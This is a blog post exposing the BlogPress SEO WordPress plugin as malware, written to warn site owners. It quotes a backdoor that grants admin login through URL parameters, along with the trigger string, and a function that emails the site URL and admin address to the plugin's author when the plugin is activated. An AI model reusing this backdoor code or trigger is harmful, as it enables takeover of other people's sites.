BlogPress SEO is Malware

As with most scamming attempts, it all started with an email—which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks—yeah right. I do not use SEO enhancement plugins (other than Google XML sitemaps), and never plan on doing so. Anyways, the sender’s name as Saurabh, and his message was as follows:

Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100’s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. http://BlogPressSEO.com Why backlinks are important for getting traffic. http://BlogPressSEO.com/#1 This is how the plugin works http://BlogPressSEO.com/#2 Thanks


Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So, I downloaded it, and did not like what I saw. Not only are there malicious components, there are several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of stylistic issues:

  • Did not use a unique prefix to functions to work avoid function name collisions. Function names such as: fun_serverpath, SureRemoveDir, fun_create_menu_wplink wplink_activate, cleansee, etc. While is looks like fun_ is the unique prefix the author is using, fun is too common of a word for a prefix and is used to denote a quantity is a function in some programming styles. Plus there is a ton of inconsistency between function names.
  • Saves it’s settings across several options entries. While this is no longer a great performance issue, thanks to autoloading, it still clutters the wp_options table and does slow down every page load by a little bit. At least the author seems to use hwe_ as the option prefix for most of the options it creates, too bad this was not done for the functions.
  • Performs manual sql queries, not using the $wpdb object.

Analysis of the code is a little frightening. Look at this block of code:

	//if loginyes and emial then login
if($loginyes==1  && $email==get_option('admin_email'))
{
	global $wpdb;
	$tabname=$wpdb->prefix."users";
	$find_admin_sql="select * from $tabname where user_login='admin'";
	$find_sql=mysql_query($find_admin_sql);
	$user_numrow=mysql_num_rows($find_sql);
	if($user_numrow!=0)
	{
		$user_login='admin';			
	}
	if($user_numrow==0)
	{
		$find_ana_admin_sql="select * from $tabname";
		$find_sql_res=mysql_query($find_ana_admin_sql);
		while($row_find=mysql_fetch_array($find_sql_res))
		{
			$userid=$row_find['ID'];
			$user_login_find=$row_find['user_login'];
			$level=get_usermeta( $userid,'wp_user_level'); 
			if($level==10)
			{
				$user_login=$user_login_find;
				break;
			}
		}
	}		
	$user=new WP_User(0, $user_login); 
	$user_pass = md5($user->user_pass);		 
	wp_login($user_login, $user_pass, true);		 
	wp_setcookie($user_login, $user_pass, true);         
	wp_set_current_user($user_id, $user_login);
	$radirect=get_option('home')."/wp-admin";	
	echo "<script language='javascript'>";
	echo "location.replace('$radirect')";
	echo "</script>";
}

Well, looks like a backdoor, right? Knowing that $loginyes and $email are set using get superglobals is even more worrying. Just append ?loginyes=1&email= to any url on a site running this script will get you in, all you need to know is the email address of the admin. Now, who would have that information?

function email_send_fun()
{
	$headers="From:".get_option('admin_email')."\n";
	$headers.="Reply-to:".get_option('admin_email')."\n";
	$sub="BlogPressSeo new installation.";
	$mes=get_option('siteurl');
	$to="info@blogpressseo.com";	
	mail($to,$sub,$mes,$headers);
	$hwe_blogidd=get_option("hwe_blogid");
	
	update_option("hwe_saveradio_option",3);
	update_option("hwe_linkplacement",3);
	
	if($hwe_blogidd)
	{
		wplink_activate();
	}
}

Oh, right, that would be whoever reads info@blogpressseo.com. This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!. This function runs every time the plugin is activated.

If you have installed this plugin, delete it immediately. Then, change your admin email address (under Settings > General, look for the option E-mail address). You’ll have to manually clean up your wp_options table as the author did not provide an uninstall method.

Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath“.

-John Havlik

[end of transmission, stay tuned]

Trackbacks/Pingbacks

  1. Pingback: A Paused Episode 462 | The CaffiNation Podcast

  2. Pingback: BlogPress SEO One Week | Mtekk's Crib

  3. Pingback: BlogPress SEO is Malware | Mtekk’s Crib | Internet Marketing NY | SMO NY | Search Engine Optimization

  4. Pingback: BlogPress SEO is Malware | Mtekk's Crib | HNL HIP HOP

  5. Pingback: WordPress Security 101: 8 Tips, Tricks and Tweaks to Secure Your WordPress Website - WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org

  6. Pingback: BlogPress SEO plugin isn’t just bad, it’s malware | Computer Technology

  7. Pingback: BlogPress SEO: solved | Programming Blog

  8. Pingback: BlogPress SEO: solved | Affaholic.com

  9. Pingback: Security Tips for your Wordpress Blog | kimtown Studios - Waynesboro, PA Web Design, Boutique & Photography

  10. Pingback: SEO + wordpress themes = shenanigans! | MetaFilter :Seo Information Search

  11. Pingback: The WordPress.org Commit Breakin – Evil Code | mtekk's Crib

  12. Pingback: El plugin BlogPress SEO es malware | Webmasters Actualidad Tecnologia

  13. Pingback: BlogPress SEO: A Year Later | mtekk's Crib

  14. Pingback: Google +1 Click Jacking | mtekk's Crib

  15. Pingback: Seo Plugin per Wordpress: occhio a cosa installate - Posizionamento Zen | Posizionamento Zen

  16. Pingback: BlogPress SEO is Malware | mtekk's Crib | Creative Web Publishing | Scoop.it

  17. Pingback: BlogPress SEO is Malware | mtekk's Crib | Creative Publishing (Not about Writing or Marketing) | Scoop.it

77 thoughts on “BlogPress SEO is Malware

Leave a Reply

Your email address will not be published. Required fields are marked *